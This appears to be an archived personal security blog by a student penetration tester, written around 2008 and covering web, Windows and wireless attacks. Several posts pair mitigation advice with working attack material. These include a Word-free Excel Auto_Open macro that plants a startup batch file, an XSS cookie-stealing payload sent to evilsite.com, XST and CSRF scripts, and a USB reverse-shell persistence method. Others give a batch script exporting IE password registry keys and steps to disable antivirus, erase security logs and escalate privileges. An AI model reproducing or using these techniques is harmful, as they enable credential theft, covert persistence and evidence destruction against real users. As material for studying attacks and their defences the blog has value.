Apache mod security

I have been working on a web proxy lately to put all of our production web servers behind. My part was to find an ids to integrate into the proxy. I found mod_security for apache. It is pretty sweet. Like any ids it has a bunch of rule sets like sql injection, xss, xst, command injection, etc... that it looks and it either logs the request, stops the request, or redirects the request. It is a pretty sweet project and so far it has worked well for us. it is best to only log requests at first or else the ids may stop legitimate traffic based on false positives.

Who needs admin

So the other day I decided to play around and see what it would take to gain control over a machine without administrative privileges. So this is what I did. I found a reverse connect back shell for windows on the government security page. Symantec does not detect it. I was going to code my own but I got lucky and found this one first. So then I wrote some batch files and visual basic scripts that would save them selves and the revshell into the user directory and user startup directory. These areas are all writable with non admin privs. The VBS script in the startup directory will strat up the revshell each time the user logs in. On a remote server I have netcat listening for a connection from my revshell. I then used my U3 drive and gonzor's switchblade to load the revshell and batch files onto the machine. So in the end all I have to do is plug my jumpdrive into a windows machine and I have instant control. If the user was running under a non administrative account I can then use exploits to elevate my privs on the machine. If the user was running an admin account then I have an instant administrative account on the machine. I chose to do it this way to keep antivirus from detecting the attack and to keep a non-administrative user from stopping the attack.

Attack Mitigation:

Run a firewall like zonealarm
Disable windows autorun
Be cautions of what media you put into your machine
Be cautions of what you run

Excel trick

This summer I discovered a fun trick using excel macros. It is possible to use an excel macro to save an excel workbook as a batch file. So I wrote a quick macro to do this. This macro will autorun when the excel book is opened. It will then save its self as a batch file in the startup directory and then change back to an xls file. Because xls file will be saved line by line as a bat file and bat files will ignore all lines that it doesn't understand you can hide one line like "net user /add hacked hackme" into a normal spreadsheet. This could be used for a social eng. attack because most people will just run the macro and never think trice about it. The next time they login to their account they will run what ever commands that you put into your batch file.

Sub Auto_Open()
ActiveWorkbook.SaveAs Filename:= _
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\go.bat", FileFormat:=xlText, _
CreateBackup:=False

ActiveWorkbook.SaveAs Filename:= _
"C:\windows\temp\pw add.xls", FileFormat:=xlNormal, _
Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, _
CreateBackup:=False
End Sub

Patiently Waiting

VMware emailed me on Monday to tell me that they have found another problem related to the vmdk crash issue. As a result they have postponed the patching of that issue till Q1 of 2009. They also informed me that they will wait to patch all my other vulnerabilities until Q1 2009. So I am still just patiently waiting. I never realized how long it can take to patch stuff like this.

PwnOS

So I have been pretty busy with school lately, so I haven't posted as much as I would like. But, I want to make a quick post about a new learning tool that I have found recently. It is called PwnOS and it is pretty cool. It is a set of 3 live slackware CDs all with different vulnerabilities and scenarios. I have only started on the 1.110 network cd but it seems pretty cool so far. I have setup a test environment using vmware server. I have a virtual network on the 192.168.1.0 subnet with dhcp and nat setup. I also have 2 VMs on that network, a backtrack 3 machine and a blank Vm that I use to run the live boot iso. It makes for great practice. PwnOS can be downloaded from http://forums.heorot.net/. There is also a preconfigured vm but it does not like to play nice with vmware server.

Update: I finished the 110 cd. It was pretty fun. I did find that you need to either use backtrack 2 of get the wordlists from /pentest/passwords/dictionaries in order to complete the challenge in any decent time. I had the passwords in other larger wordlists, but it is best to use the ones supplied in BT2(They were removed in BT3.).

Update:
I finished w/ the 1.100 cd and I am moving on to the 2.100 cd.

Update:
I finished the 2.100 cd and I am cracking the root password for a bonus. Man...it was so obvious once I figured it out. I cant believe it took me so long. But, it was a very good practice cd none the less.

A look at the Underground

A while ago I attended a presentation given by the VP of security of a large bank. In his presentation he talked a lot about "carding" or the theft of credit card information. He showed us how shockingly open the underground market is. I have been meaning to look into the subject for a while now and recently I began looking and found this excellent white paper here. This paper was written in 2005 but is still quite relevant. It explains how open the underground market is, how they self police themselves, how they conduct transactions, and some of they common terminology. If you would like to look into the market do a google search for or . You will be amazed. here is an interesting example.
So, how can we put a stop to this? Stop the crooks or stop the market? You stop one crook and he will be quickly replaced, but if you can hinder the market then they are all affected. Obviously it is an extremely complicated issue, but if you could impose a higher cost of doing business upon the market then profits would be adversely affected. If crooks made less money than they would seek other money making activities. What can be done?

U3 AutoFun

Over the summer Rob, one of the guys I work with, introduced me to Gonzore's Switchblade, a program used to turn your U3 flash drive into an awesome hack tool. Gonzore uses the U3 universal customizer to replace the U3 iso with an iso that autoloads a bunch of customized hack tools. Windows will not autorun from a usb drive but the U3 drives have a special controller board that allows them to mount a cdrom drive also. Windows will autorun from a cdrom drive. This means that since you can customize the iso on the U3 drive, U3 drives can run any program that you want without ever prompting the user.(There is one extra step needed to make it silently install.) That is pretty ugly, the next time your friend plugs his U3 into your machine he could be silently installing a keylogger, trojan, or almost anything. So watch out.

Attack Mitigation:

It is possible to disable autorun on a windows machine in the following ways:

start>run>gpedit.msc>local computer>administrative template>system>turn off autoplay
start>run>regedit>hkey_local_machine>system>services>cdrom>autorun = 0

VMware disk space DoS

So I have been reading the VMware security hardening guide(http://blogs.vmware.com/security/2008/07/update-to-vi3-s.html) and I came across several interesting notes. This one caught my eye:

"Virtual machines can write troubleshooting information to a virtual machine log file (vmware.log) stored on the VMware VMFS volume used to store other files for the virtual machine. Virtual machine users and processes can be configured to abuse the logging function, either intentionally or inadvertently, so that large amounts of data flood the log file. Over time, the log file can consume so much of the ESX/ESXi host’s file system space that it fills the hard disk, causing an effective denial of service as the datastore can no longer accept new writes."

So, I decided to write some code that would do just that. There are many many ways to achieve this, one of them being a script that invokes the xferlog program that comes with VMware tools. This method also caused about 50% of the cpu resources to be consumed on the host. It was necessary to throttle my script back a little though or else it sets off an alarm on the host and stops the logging process. But, with the throttled script I can fill about .5Mb/min of disk space.

Attack mitigation:

Use the following VM settings:
log.rotateSize 100000
log.keepOld 10
or
Isolation.tools.log.disable true

Program Debugging

So I have been doing a lot of research on VMware lately and to understand how a VM communicates with the host I started refreshing myself on assembly code. Here is an excellent tutorial http://www.xs4all.nl/~smit/asm01001.htm Next I started to learn how Ollydbg works and I needed some practice applications. http://hackquest.de/ is a "wargame" that has many challenges including a "cracking" section. I downloaded their cracking apps and used them as practice to learn Ollydbg. Ollydbg is a powerful reverse engineering tool so, I will leave the rest of the learning process up to you.

Blogger XSS

So came across this in march 2008 while posting my blog on XSS. I included example code and to my suprise it executed. I emailed Blogspot about this issue but no one really seemed to care. But Just so everyone knows, anyone can put malicious code into their blogspot blog. They designed it to be this way so that people will not be restricted in their blogging creativity. Well that's just great, thanks google for giving me the creative ability to pwn someone using one of the worlds most used blog sites. Take a look at google's solution to this issue.

http://help.blogger.com/bin/answer.py?answer=67427&topic=12469

They recommend that people report blogs who abuse this. Well how many people using blogger know what XSS is and what about more subtle XSS attacks like cookie theft etc... I think it is rediculous that google is leaving everyone open to this attack. A study posted on stopbadware.com lists google.com and the number 5 most infected domain in the world with 4261 infected sites. How many of those are blogger blogs? Does google really disable infected blogs? I doubt it.

http://www.stopbadware.org/home/badwebs

Here is another article about the issue by network world.

http://www.networkworld.com/news/2008/013108-attacker-google-blog.html

Google is notorious for ignoring security, and this is just another example.

VMware Update

Vmware has told me that they will be releasing the patch for my previously reported ESX server vulnerability in Q3. I will write about the issue in full detail at that time. In the mean time I have been spending some of my time looking at the web management interface of VMware server. I have identified one XSS and one session management Issue so far. It seems to me that Vmware has a relativly leanient stance when it comes to certain areas of its security. An attacker just needs to know where to look. I can't wait to be able to test on my ESX box when I get back to Utah.

Our Welcome to Houston

So in spite of living in a nice gated community in Houston this summer we had our window busted and our GPS stolen the other night. But, I get a small amount of comfort knowing that I hacked my GPS first to display this screen on startup. But, in hindsight I wish I would have put written STOLEN!!! Please call(MY Phone #) . But at lease whoever stole it will have a nice suprise waiting for him when he turns it on. What would you think if you bought a new GPS on ebay/at a pawn shop and saw the this screen upon startup?

Hurray! For Webgoat

Hurray! I finally finished all of the lessons in OWASP's Webgoat application. Webgoat is an awesome application developed by OWASP.org designed to teach people about common web application vulnerabilities and how to exploit them. It is a tomcat server and web application written in jsp that contains examples of many common web vulnerabilities and instructions and helps on how to exploit them. It is an amazing hands on teaching tool for teaching people how to secure their web applications. I would recommend t to anyone interested in learning about web vulnerabilities.

See: Owasp's Webgoat

Cross Site Tracing(XST)

Cross site tracing is a technique that is used to circumvent Microsoft's httpOnly flag. The httpOnly flag is used to keep scripts from accessing cookie information. The http trace function is a http debugging function that will echo back any information sent to it in a trace request. For example:

TRACE http://mysite.com /HTTP/1.1
Host: http://mysite.com
Cookie: Auth-cookie.....

would echo the the cookie entire header back to the requester. Since a script did not access the cookie , the httpOnly flag did not protect the cookie . An attacker could use an existing CSS vulnerability to insert the following AJAX code into a website.

< script >
var xhr;
var url = "http://mysite.com";
try {
xhr = new ActiveXObject('Msxml2.XMLHTTP');

}
catch (e)
{

try {
xhr = new ActiveXObject('Microsoft.XMLHTTP');

}
catch (e2)
{

try {
xhr = new XMLHttpRequest();

}
catch (e3) { xhr = false; }
}
}

xhr.open('TRACE', url , true);
xhr.send(null);

// collect the response and send it to a site that you control

< /script >

The above code would use AJAX to send a trace request to the server hosting the website. The browser would send and cookie information that it holds for the website. The server would then echo back the information that was sent to it by the browser, including the cookie and the AJAX script could collect he response and send it to a page controlled by the attacker. This is bad because the attacker now has access to important session information.

Attack Mitigation:

1. Disable trace on your web servers.

2. Also luck for us Firefox and IE have disabled AJAX trace requests. So using one of these browsers will stop this attack using AJAX. It is still possible to execute the attack using other methods like ActiveX though.

For further explanation see: http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf

Cross Site Request Forgery(CSRF)

My boss asked me to start testing our web application for web exploits. So I have been doing a lot of reading and code review lately. It is like a dream come true. But, this morning I learned AJAX so that I could do CSRF post requests via XSS. It seems to be a pretty sweet attack. CSRF is basically just tricking a user into visiting a malicious link, page controlled by the attacker, or page with a XSS vulnerability. The attacker then uses one of those methods to execute a GET or POST request against a site that the victim is currently logged into. To the authenticated site it will appear as if the request came from the victim. The request may be a simple as having the victim click a link such as https://victimsite.com/purchase.php?item=tv&quantity=100. The attacker could also use AJAX to execute the request with code like this:

var req;
var url = "https://victimsite.com/purchase.php";
var params = "item=tv&quantity=100";
try {
req = new XMLHttpRequest();
}
catch (e3) { document.write("error") }

req.open('POST', url , true);
req.send(params);

The above AJAX code would be placed on site with an XSS vulnerability and would be used against a site that uses post instead of a simple get request.

Mitigation:

Require a unique session variable to appended to each request. It also helps to use POST instead of GET.(This only makes it harder not impossible.)

On a side not Firefox claims to stop any AJAX code that makes a POST/GET request to any page that is not the parent page.

VMware ESX server 3 issue

I was have been busy at work developing a homegrown backup system for virtual machines on VMware ESX server 3 and while working the other day I came across a bug that causes the entire ESX server to crash. The error is in the way ESX server handles virtual disk files. I created a virtual disk delta file that was empty except for a special magic number at the beginning of the file. When that ESX server tried to power on the virtual machine containing my fake disk it caused the whole ESX host to dump its memory and crash.(Purple screen of death) Since this is only a local vulnerability it is not a very big deal. But, if used creatively it could be used to create a DOS of every virtual server running on the host. It could be delivered by tricking some one into downloading and installing a virtual appliance containing the specially crafted file. The VMware reps tell me that every fortune 500 company uses VMware ESX. Interesting...

My first cantenna

I actually made this cantenna last november, but I have been play with it a lot since school got out. I went to a thrift store the other night and got a great tripod for 2 dollars. The tripod really helps a ton. I still don't have an exact number for my gain, but I think that it gives be about an extra 5 db. I found several new open access points near my apartment the other night after I mounted it on the tripod. I think I will try a few different designs this summer.

PHP and SQL Injection

Lately I have been playing around a lot with PHP vulnerabilities and SQL injection. I found some really great guides on milw0rm and read as much as I could. I also needed a test box running PHP and an SQL server to experiment on. I installed XAMPP because it was so quick and easy to setup. I made a few scripts to test on, but upon further inspection on their PHP code I found that there were plenty of exploits in the sample applications. The CD app and the phonebook app both have sql injection vulnerabilities and the phonebook has a stored XSS vulnerability. I then did a google search(intitle: xampp version) and found that there are many systems on the net that have xampp installed with a default setup. I was able to learn by playing around with xampp.

XSS cookie theft

Cross Site Scripting(XSS) is a vulnerability that is caused when web programmers fail to validate user input that is later published on the page. If an attacker were to input a script like < script > alert("hello world!")< /script > into a form, then the javascript would be published on the page and executed in the browser as if it came from the site its self. The previous script is harmless but if an attacker were to input a script like < script > window.open("http://evilsite.com/cookiegrabber.php?cookies="+document.cookie); < /script > the attacker could steal the session cookies from every user who visits the XSS vunerable site. This site is common on search pages written in php, but it can be found in any page that accepts user input. There are many variations on this attack and it seems to be very popular.

Attack mitigation: Check all user input and convert (, <, >, /, %, ", ', +, &, ) characters to literal values like &lt and &gt before storing them or displaying them on a page.

Thanks to Xylitol and CgiSecurity for their helpful guides.

Do I smell Gmail cookies?

I have always wanted to know how session hijacking via cookie theft worked. So I decided to try it for my self on my home network. This vulnerability occurs when websites use session cookies to validate a users access to resources. Often websites encrypt the initial login session but then pass the session cookie back and forth in plain text. Under these conditions it is possible for an attacker to use a packet sniffer to capture the session cookie and use it to gain access to a victims a account. On my home network I was able to capture my Gmail session cookie using Wireshark. I was then able reinsert it back into a session on different computer using Webscarab and gain access to my account without logging in. To make things worse gmail sessions never really time out unless you logout. Since many people store valuable information in their email I feel like this is a particularly dangerous vulnerability. I think Gmail needs to encrypt their entire session. I don't think I will ever check my Gmail over an unsecure network again. I am going to start using my mail client with ssl instead.

Active Man-in-the-Middle Attack

So I have always heard that it is possible to use a Man-in-the-Middle attack to completely control the network traffic of your victim. I got to thinking about this and decided to find out just how hard it would be. I found out that it was not hard at all. My goal was to execute a Man-in-the-Middle attack that redirected my victim to my own server when they tried to access the page www.gmail.com. So I used my favorite Man-in-the-Middle tool Cain and Able to execute the Man-in-the-Middle portion of the attack. I then did an nslookup on www.gmail.com and added their IP address as a second address on my attack machine. So now when my victim requests gmail.com my web server responds before the request ever hits the real gmail.com server. I then saved the source of the Gmail login page to my own machine. I took my new page that looks exactly like Gmail's login and made a few modifications. Instead of the login form sending its data to the Gmail server I sent it to my own JSP page called Save_info.jps. The save info page takes their username and password and stores it to a text file on the server and then logs them in to the real Gmail and redirects them to the mail.google.com. The user never even knows that they were just hacked because they get logged into their Gmail account as expected. The only indicator of trouble is that my page will appear as http://www.gmail.com while the real page would appear as https://www.gmail.com. It is really kind of frightening because most users would never even check to make sure there is an https in the url. It took me about 1 hour to craft this attack.

Attack Mitigation:

1.If possible you can make a static ARP entry for you gateway. This will stop the Man-in-the-Middle attack from working.
2.Use a program like Arpwatch that checks for changes in your arp table.
3.Watch for the https in the url.

Dumpster Diving in Memory

I recently read an article about how information can remain active in memory even after the machine has been powered off. A group of researchers were using this information to try and break disk encryption. I also read an article at http://www.beginningtoseethelight.org/ntsecurity/ that interested me. These articles inspired me to look around and see what I can find in memory. So I started by using a tool called pmdump and HxD to view the memory space of my active processes. In the ntsecurity article they claim that a users password is stored in plain text in the memory space belonging to the lsass service. I tested this by logging in and immediately dumping the lsass memory. In also tryed this on the winlogon service and was never able to find my password in plain text. I also used dd to dump the entire physical memory of my system and was not able to find my windows password anywhere in memory. It might be so volatile that it gets erased before I dump my memory, but I have not tested this yet. Maybe I could make a script and execute it after login. I didn't have luck with the system password, but I was able to consistently find my password in memory for ***** hidden passwords for any program. All I had to do was open the HxD, view the memory space for that program, and search for the password in inicode. Many programs had common markers by the passwords. I also had good luck finding passwords post-login using the same method. However most programs write to memory so often that the passwords are quickly lost. I was especially interested in recovering post-login passwords in Firefox and IE. I found that these are usually highly volatile but can often be found by searching in ascii mode for the post variables(ie: passwd=, password=, pw=).
Because memory is so volatile you need luck on your side to find passwords in memory. But, thanks to memory paging and hibernation many items can be stored in the pagefile.sys and hiberfile.sys. Depending on the size of these file they can store information for quite some time. a good search of a systems page file and hibernation file could yield positive results.
Thanks to the ntsecurity article and the sysinternals suite I was able to make my attack remote. By issuing the following commands it is possible to dump the memory of a remote machine.

pslist \\
psexec \\ -u -p -c pmdump
move \\\$remotedir localdir

Because many organization use the same administrative account and password for multiple computers, if an attacker were able to obtain the admin password he could remotely dump the active memory of every computer he has access to. Administrators often use weak administrative passwords on all their desktop machines because they say "If someone breaks the password the worst that can happen is they screw up one machine. I will reimage it and it will be fixed. Its not like its a server." Using this memory attack a creative attacker could cause a lot of damage.

FTK

It has been a while since I have posted. This is because I have been working on a project for my digital forensics class. It has been pretty interesting and I have learned a lot about the Forensic Tool Kit(FTK), steganography, EFS, PGP, and basic zip encryption. Its been great, but don't worry I should be ready to post soon on finding information in Pagefile.sys and physical memory dumps.

Why MAC filtering is poor wireless security

MAC filtering on a wireless access point is easily bypassed. Many organizations use MAC filtering as a means of keeping non-paying customers off of their wireless network. I have seen 2 basic implementations of this :
1. Device can't read or pass any traffic across the network unless its MAC is in the list.
2. Device can read but can't pass traffic(except ARP/DHCP) across the network unless its MAC is in the list.

Both 1 and 2 can be bypassed by using Kismet and listing the connected devices. The attacker then spoofs his MAC to look like an authenticated device. 2 can also be bypassed by connecting to the access point and using Wireshark to see which devices are sending TCP traffic. Once again the attacker spoofs his MAC address to look like a device that is sending TCP traffic.

Wireless Cracking Help

It can be really painful to try and get the right card, driver, and wireless tools working together. I have found that the Backtrack security suite makes this a little easer. They have added most of the drivers you need to their distro. Backtrack even detects and configures your card for you on bootup. I have tried Backtrack with many different pcmcia wireless cards and almost all of them have worked. I picked up a Orinoco gold card off of ebay for $30. This card is obviously a knock off but it was cheap and it uses the same firmware . It also has an external antenna adapter that I can attach to my cantenna. The card has actually worked pretty well for me. But the backtrack suite is my tool of choice for cracking wireless networks. It does a great job of bringing the drivers and the tools together.

War Drive in Provo

Since the Home Depot and TJ Max incidents there has been a lot of talk about wireless security at retail stores. It was insecure wireless networks at these two stores that allowed hackers to gain access to the "secure" internal corporate network. I was curious about this and decided to see for myself, except I decided to look at private home networks instead. I used my Orinoko gold card and Net stumbler to conduct my experiment. I drove through some of the residential areas of Provo, Utah counting the number of secure vs. insecure access points. I did the same in Idaho falls, Idaho. I was amazed to find that in Provo 46% of the access points had no security enabled and in Idaho falls 51% of the access points had no security enabled. The statistics may vary, but I think they are quite telling. Something really needs to be done to help protect the general public. (Note: I did not attempt to access any of the networks in this test. That would be unethical and potentially illegal.)

Elevate any account to administrator

This is kind of a cheap shot because you can do almost anything by booting to another os. But it is possible to elevate your account to an administrative account simply by booting to another os like knoppix and using a number of strategies. One method of doing this is:
1. Create an exe that executes a command like "net user localgroup administrators /add "
2. Boot into knoppix from a cd or flash drive and mount the windows system drive as writable.
3.Replace an exe on the system that will be run under the system account with your exe.
4. Boot into windows and login. As soon as the service is run it will elevate your account.

This is one of many attacks that can be executed this way.

Attack mitigation:

Create a bios or if possible harddisk password and disallow cd/usb boot.

From Admin to System user

This can be done with one command. As administrator open a command prompt. Type "at /interactive "cmd.exe". This will run a command prompt as the system user. Open the task manager and stop "explorer.exe". Type "explorer" in your new prompt window and press enter. Now you are running as the System user. This can be done because the scheduler service runs under the System user account.

Disable Symantec Antivirus

It is nearly impossible to stop Symantec Antivirus. Even after all Symantec services are stopped it still continues to scan. This is because it continues to run from a rooted directory located at program files\symantec antivirus\OEM. But it is possible to disable Symantec.
1. Stop symantec avtivirus service
2. Stop defwatch service
3. rename the \program files\common files\symantec shared\virusdefs directory

Symantec will continue scan but it won't be able to find its virus definitions. Symantec will correct its self at the next Liveupdate, so this is not a longterm hack. This will also cause Symantec to log systems errors and tamper errors.

How to elevate Windows Power user to Administrator

This one has been a real eye opening project for me. In order to minimize administrative burden many organizations use the power user group. The power user does have limited privileges, but this only gives a false sense of security. It is extremely easy for a power user to elevate themselves to an administrative user. It is this easy:

1. Find a service that runs as the system user and can be written to by the power user group.(ex. many symantec services)
2. program an exe that adds your user to the administrator group.
3. stop the service
4. replace the service exe with your exe.
5. restart the service
6. run net localgroup administrators. Look you are now an administrator.
7. relogin

Attack mitigation:

Dont use power user
Remove power user write privs to all services that run under an elevated user account.(imposible)

Erase windows security log

The security log can't be deleted while the event logger service id running. Set the "Event Log" service to disable and restart the machine. Then delete the file "\windows\system32\config\SecEvent.evt". The values in this file can also be changed with a hex editor. Reset the event log service to automatic and it will restart the next time the machine restarts.

Exporting IE password files to another computer

There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can take import the passwords onto their own machine and use tools to decrypt the passwords. This is a copy of my script:

@ echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\" > NUl

The IE 7 passwords are stored in the following path:

HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

How to delete Symantec Antivirus Logs

Because there are no locks on Symantec logs, they can be easily deleted. The logs are stored in two different places in WinXp: \Documents and Settings\\Local Settings\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs and \Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs. This may not seem very important but it can be used by an attacker to cover up failed attempts to use hack tools on a machine.

Solution


Deny write and delete access to non-system/administrative users.

How to recover saved firefox passwords

There are many different software packages on the market designed to recover saved Firefox passwords. In this article I will explain how to view saved Firefox passwords without any special software. We will let Firefox do all the work for us.

Method 1:
If you have access to the windows account where the passwords are saved then the solution can be simple. Open Firefox and go to tools>options>security>show passwords. This will list all of the accounts with saved passwords. If you click the show passwords button it will display all of the correlating passwords.

Method 2:
This method is a little more advanced, but can be used to recover the passwords of any account on the machine. The passwords are saved in the directory \Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\. The files that store the passwords are signons2.txt and keys3.db. If these files are taken and put in the above path of another machine the can be viewed using method 1. The password is recovered and no fancy software was needed.

Attack Mitigation:

Use a master password in your Firefox browser. Go to Firefox>tools>options>security and check the use master password box. This will cause Firefox to ask for a master password before displaying the saved passwords. There are some software packages capable of recovering the passwords even with the master password set, but this will stop casual hackers.

About me and My blog

My Name is Craig Marshall. I am a student at BYU in the Information Systems department. I am interested in computer security and digital forensics. Upon graduation I will be working as a penetration tester for Ernst and Young's Advances Secrity Center. This is a running log of my research and findings. (Note: All of my research is done in my own controlled test environment. I do not attack other peoples machines!)